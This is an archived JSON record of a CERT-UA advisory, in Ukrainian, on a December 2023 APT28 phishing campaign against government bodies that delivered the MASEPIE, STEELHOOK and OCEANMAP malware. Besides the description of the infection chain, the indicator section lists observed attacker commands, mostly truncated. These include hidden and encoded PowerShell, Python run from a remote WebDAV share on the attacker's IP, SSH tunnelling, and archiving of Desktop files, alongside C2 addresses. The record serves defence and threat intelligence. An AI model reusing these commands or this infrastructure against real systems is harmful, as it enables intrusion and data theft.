{ "id": "02446983-7e3f-446f-8842-4931e867076f", "created_at": "2026-04-06T00:07:39.510065Z", "updated_at": "2026-04-10T13:12:20.819912Z", "deleted_at": null, "sha1_hash": "e8ad419e6ccf2f422886313c953612b1fac2f240", "title": "CERT-UA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2632612, "plain_text": "CERT-UA\r\nArchived: 2026-04-05 21:13:10 UTC\r\nЗагальна інформація\r\nПротягом 15-25 грудня 2023 року виявлено декілька випадків розповсюдження серед державних\r\nорганізацій електронних листів з посиланнями на \"документи\", відвідування яких призводило до ураження\r\nЕОМ шкідливими програмами.\r\nВ процесі дослідження інцидентів з'ясовано, що згадані посилання забезпечують перенаправлення жертви\r\nна вебресурс, на якому за допомогою JavaScript та особливостей прикладного протоколу \"search\" (\"ms-search\") [1] здійснюється завантаження файлу-ярлика, відкриття якого призводить до запуску PowerShell-команди, призначеної для завантаження з віддаленого (SMB) ресурсу та запуску (відкриття) документу-приманки, а також інтерпретатора мови програмування Python і файлу Client.py, що класифіковано як\r\nMASEPIE.\r\nЗ використанням MASEPIE на комп'ютер довантажується та запускається OPENSSH (для побудови\r\nтонелю), PowerShell-сценарцій STEELHOOK (викрадення даних Інтернет-браузерів Chrome/Edge), а також\r\nбекдор OCEANMAP. Крім того, протягом години з моменту первинної компрометації на комп'ютері\r\nстворюються IMPACKET, SMBEXEC та ін., за допомогою яких здійснюється розвідка мережі та спроби\r\nподальшого горизонтального переміщення.\r\nЗа сукупністю тактик, технік, процедур та інструментарію активність асоційовано з діяльністю\r\nугрупування APT28. При цьому, очевидно, що зловмисний задум також передбачає вжиття заходів з\r\nрозвитку кібератаки на всю інформаційно-комунікаційну систему організації. Таким чином, компрометація\r\nбудь-якої ЕОМ може створити загрозу для всієї мережі.\r\nЗауважимо, що випадки здійснення аналогічних атак зафіксовано також у відношенні польських\r\nорганізацій.\r\nДовідково:\r\nOCEANMAP - шкідлива програма, розроблена з використанням мови програмування C#. Основний\r\nфункціонал полягає у виконанні команд за допомогою cmd.exe. Як канал управління\r\nвикористовується протокол IMAP. Команди, в base64-кодованому вигляді, містяться у чернетках\r\nповідомлень (\"Drafts\") відповідних каталогів електронних поштових скриньок; кожна з чернеток\r\nмістить назву ЕОМ, ім'я користувача та версію ОС. Результати виконання команд зберігаються в\r\nкаталозі вхідних повідомлень (\"INBOX\"). Реалізовано механізм оновлення конфігурації (інтервал\r\nперевірки команд, адреси та автентифікаційні дані облікових записів пошти), що передбачає патчинг\r\nвиконуваного файлу бекдору та перезапуск процесу. Персистентність забезпечено шляхом\r\nстворення .URL-файлу 'VMSearch.url' в каталозі автозапуску.\r\nhttps://cert.gov.ua/article/6276894\r\nPage 1 of 5\n\nMASEPIE - шкідлива програма, розроблена з використанням мови програмування Python.\r\nОсновний функціонал полягає у завантаженні/вивантаженні файлів та виконанні команд. Як канал\r\nуправління використовується протокол TCP. Дані шифруються за допомогою алгоритму AES-128-\r\nCBC; ключ, що є послідовністю 16 довільних байт, генерується на початку встановлення з'єднання.\r\nПерсистентність бекдору забезпечується створенням ключа 'SysUpdate' в гілці \"Run\" реєстру ОС, а\r\nтакож, за допомогою LNK-файлу 'SystemUpdate.lnk' в каталозі автозапуску.\r\nSTEELHOOK - PowerShell-сценарій, що забезпечує викрадення даних Інтернет-браузерів (\"Login\r\nData\", \"Local State\") та майстер-ключа DPAPI шляхом їх відправки на сервер управління за\r\nдопомогою HTTP POST-запиту в base64-кодованому вигляді.\r\nІндикатори кіберзагроз\r\nФайли:\r\n9724cecaa8ca38041ee9f2a42cc5a297 4fa8caea8002cd2247c2d5fd15d4e76762a0f0cdb7a3c9de5b7f4d6b2ab34ec6\r\n5f126b2279648d849e622e4be910b96c 6bae493b244a94fd3b268ff0feb1cd1fbc7860ecf71b1053bf43eea88e578be9\r\n47f4b4d8f95a7e842691120c66309d5b 18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6\r\n8d1b91e8fb68e227f1933cfab99218a4 6d44532b1157ddc2e1f41df178ea9cbc896c19f79e78b3014073af2d8d9504fe\r\n6fdd416a768d04a1af1f28ecaa29191b fb2c0355b5c3adc9636551b3fd9a861f4b253a212507df0e346287110233dc23\r\n5db75e816b4cef5cc457f0c9e3fc4100 24fd571600dcc00bf2bb8577c7e4fd67275f7d19d852b909395bebcbb1274e04\r\n6128d9bf34978d2dc7c0a2d463d1bcdd 19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc\r\n825a12e2377dd694bbb667f862d60c43 593583b312bf48b7748f4372e6f4a560fd38e969399cf2a96798e2594a517bf4\r\nacd9fc44001da67f1a3592850ec09cb7 c22868930c02f2d6962167198fde0d3cda78ac18af506b57f1ca25ca5c39c50d\r\nМережеві:\r\n\\\\194[.]126.178.8@80\\webdav\\Docs\\231130 № 581.pdf .lnk\r\n\\\\194[.]126.178.8@80\\webdav\\Docs\\231130 № 581.pdf\r\n\\\\194[.]126.178.8@80\\webdav\\Python39\\Client[.]py\r\n\\\\194[.]126.178.8@80\\webdav\\Python39\\python[.]exe\r\n173[.]239.196.66 (X-Originating-IP)\r\n(tcp)://88[.]209.251.6:80\r\n194[.]126.178.8\r\n88[.]209.251.6\r\n74[.]124.219.71 (OCEANMAP C2)\r\nczyrqdnvpujmmjkfhhvs4knf1av02demj.oast[.]fun\r\nczyrqdnvpujmmjkfhhvsclx05sfi23bfr.oast[.]fun\r\nczyrqdnvpujmmjkfhhvsgapqr3hclnhhj.oast[.]fun\r\nczyrqdnvpujmmjkfhhvsvlaax17vd5r6v.oast[.]fun\r\nhXXp://194[.]126.178.8/webdav/wody[.]pdf\r\nhXXp://194[.]126.178.8/webdav/wody[.]zip\r\nhXXp://194.126.178.8/webdav/StrategyUa.pdf\r\nhXXp://194[.]126.178.8/webdav/231130N581[.]pdf\r\nhXXp://czyrqdnvpujmmjkfhhvsclx05sfi23bfr.oast[.]fun\r\nhXXp://czyrqdnvpujmmjkfhhvsgapqr3hclnhhj.oast[.]fun\r\nhttps://cert.gov.ua/article/6276894\r\nPage 2 of 5\n\nhXXp://czyrqdnvpujmmjkfhhvsvlaax17vd5r6v.oast[.]fun\r\nhXXp://czyrqdnvpujmmjkfhhvs4knf1av02demj.oast[.]fun\r\nhXXps://nas-files.firstcloudit[.]com/\r\nhXXps://ua-calendar.firstcloudit[.]com/\r\nhXXps://e-nas.firstcloudit[.]com/\r\njrb@bahouholdings.com (OCEANMAP C2)\r\nnas-files.firstcloudit[.]com\r\ne-nas.firstcloudit[.]com\r\nua-calendar.firstcloudit[.]com\r\nqasim.m@facadesolutionsuae.com (OCEANMAP C2)\r\nwebmail.facadesolutionsuae[.]com (OCEANMAP C2)\r\nХостові:\r\n%PROGRAMDATA%\\2.txt\r\n%PROGRAMDATA%\\python.zip\r\n%PROGRAMDATA%\\python\\python-3.10.0-embed-amd64\\Client.py\r\n%USERPROFILE%\\.ssh\\known_hosts\r\n%LOCALAPPDATA%\\11.zip\r\n%LOCALAPPDATA%\\Temp\\RarSFX0\\VMSearch.exe\r\n%LOCALAPPDATA%\\Temp\\RarSFX1\\VMSearch.exe\r\n%LOCALAPPDATA%\\Temp\\VMSearch.sfx.exe\r\n%LOCALAPPDATA%\\i.lnk\r\n%LOCALAPPDATA%\\key\r\n%LOCALAPPDATA%\\python.zip\r\n%LOCALAPPDATA%\\python\\python-3.10.0-embed-amd64\\Client.py\r\n%LOCALAPPDATA%\\python\\python-3.10.0-embed-amd64\\python.exe\r\n%LOCALAPPDATA%\\qz.zip\r\n%LOCALAPPDATA%\\s.lnk\r\n%LOCALAPPDATA%\\s.zip\r\n%LOCALAPPDATA%\\s2.zip\r\n%LOCALAPPDATA%\\s3.zip\r\n%LOCALAPPDATA%\\sys.zip\r\n%LOCALAPPDATA%\\t.lnk\r\n%LOCALAPPDATA%\\temp1.txt\r\n%LOCALAPPDATA%\\temp2.txt\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SystemUpdate.lnk\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\VMSearch.url\r\nC:\\WINDOWS\\system32\\cmd.exe /c \"powershell.exe -c \"$a=Get-Content \"%LOCALAPPDATA%\\2.txt\";powershell.e\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hid -nop -c \"[system.Diagnostics.Process\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hid -nop -c \"[system.Diagnostics.Process\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hid -nop -c \"[system.Diagnostics.Proces\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hid -nop -c %LOCALAPPDATA%\\python\\python\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hid -nop -c \\\\194.126.178.8@80\\webdav\\Py\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -encodedCommand \"QQBkAG\r\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -encodedCommand QQBkAGQ\r\nhttps://cert.gov.ua/article/6276894\r\nPage 3 of 5\n\n\\\\194.126.178.8@80\\webdav\\Python39\\python.exe \\\\194.126.178.8@80\\webdav\\Python39\\Client.py\r\ncmd /C start powershell.exe -w hid -nop -c \"%LOCALAPPDATA%\\python\\python-3.10.0-embed-amd64\\python.ex\r\npowershell -c start-process ssh.exe -windowstyle Hidden -ArgumentList \"-N -o ServerAliveInterval=30 -\r\npowershell -c start-process ssh.exe -windowstyle Hidden -ArgumentList \"-N -o ServerAliveInterval=30 -\r\npowershell.exe -c \"$a=Get-Content \"%PROGRAMDATA%\\2.txt\";powershell.exe -windowstyle hidden -encodedC\r\npowershell.exe -c $a=Get-Content -Encoding 'Default' -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'String' -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'ascii' -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'oem' -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'oem' -Path \"%LOCALAPPDATA%\\temp.txt\";Compress-Archive -Fo\r\npowershell.exe -c $a=Get-Content -Encoding 'oem' -Path \"%LOCALAPPDATA%\\temp.txt\";dir \"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'oem' -Path \"%LOCALAPPDATA%\\temp1.txt\";Compress-Archive -F\r\npowershell.exe -c $a=Get-Content -Encoding 'oem' -Path \"%LOCALAPPDATA%\\temp2.txt\";Compress-Archive -F\r\npowershell.exe -c $a=Get-Content -Encoding 'oem' -Path \"%LOCALAPPDATA%\\temp2.txt\";dir \"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'unicode' -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'utf32' -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Encoding 'utf8' -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Path \"%LOCALAPPDATA%\\temp.txt\";\"$a\"\r\npowershell.exe -c $a=Get-Content -Path \"%LOCALAPPDATA%\\temp.txt\";Compress-Archive -Force \"$a\" %LOCALA\r\npowershell.exe -c Compress-Archive -Force %USERPROFILE%\\Desktop\\ %LOCALAPPDATA%\\qz.zip\r\npowershell.exe -c Get-WinEvent -FilterHashtable @{logname=\"system\"; id=1129}\r\npowershell.exe -c Get-WinEvent -FilterHashtable @{logname=\"system\"; id=1501}\r\npowershell.exe -c dir /S %USERPROFILE% *.dat\r\npowershell.exe -c import-module ActiveDirectory;Get-AdDomainController\r\npowershell.exe -c net time /domain\r\npowershell.exe -c net time /domain:%DOMAIN%.local\r\npowershell.exe -w hid -nop -c %LOCALAPPDATA%\\python\\python-3.10.0-embed-amd64\\python.exe %LOCALAPPDAT\r\npowershell.exe -w hid -nop -c Expand-Archive -Force %PROGRAMDATA%\\python.zip %PROGRAMDATA%\\python\r\npowershell.exe -w hid -nop -c start \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SystemUp\r\npowershell.exe -w hid -nop gpresult /z\r\npowershell.exe -w hid -nop gpupdate\r\npowershell.exe Compress-Archive -Force %USERPROFILE%\\Desktop\\ %LOCALAPPDATA%\\sys.zip\r\npowershell.exe Compress-Archive -Force %USERPROFILE%\\Desktop\\*.lnk %LOCALAPPDATA%\\11.zip\r\npowershell.exe Compress-Archive %USERPROFILE%\\Desktop %LOCALAPPDATA%\\sys.zip\r\npowershell.exe Expand-Archive -Force %LOCALAPPDATA%\\python.zip %LOCALAPPDATA%\\python\r\npowershell.exe Get-ADDomainController\r\npowershell.exe Get-Content %LOCALAPPDATA%\\i.lnk\r\npowershell.exe Get-DnsClientServerAddress\r\npowershell.exe Get-NetAdapter\r\npowershell.exe Get-NetAdapterBinding | Where-Object ComponentID -EQ 'ms_tcpip6'\r\npowershell.exe Get-NetIPConfiguration -All\r\npowershell.exe Resolve-DNSName %DC%\r\npowershell.exe Resolve-DNSName %DOMAIN%.local\r\npowershell.exe Test-NetConnection %FS% -Port 445 -v\r\npowershell.exe [System.Directoryservices.Activedirectory.Domain]::GetCurrentDomain()\r\npowershell.exe date\r\npowershell.exe dir %USERPROFILE%\\Desktop\r\nhttps://cert.gov.ua/article/6276894\r\nPage 4 of 5\n\npowershell.exe ipconfig /flushdns\r\npowershell.exe net start dnscache\r\npowershell.exe net stop dnscache\r\nГрафічні зображення\r\nРис.1 Приклад ланцюга ураження\r\nSource: https://cert.gov.ua/article/6276894\r\nhttps://cert.gov.ua/article/6276894\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://cert.gov.ua/article/6276894" ], "report_names": [ "6276894" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434059, "ts_updated_at": 1775826740, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e8ad419e6ccf2f422886313c953612b1fac2f240.pdf", "text": "https://archive.orkl.eu/e8ad419e6ccf2f422886313c953612b1fac2f240.txt", "img": "https://archive.orkl.eu/e8ad419e6ccf2f422886313c953612b1fac2f240.jpg" } }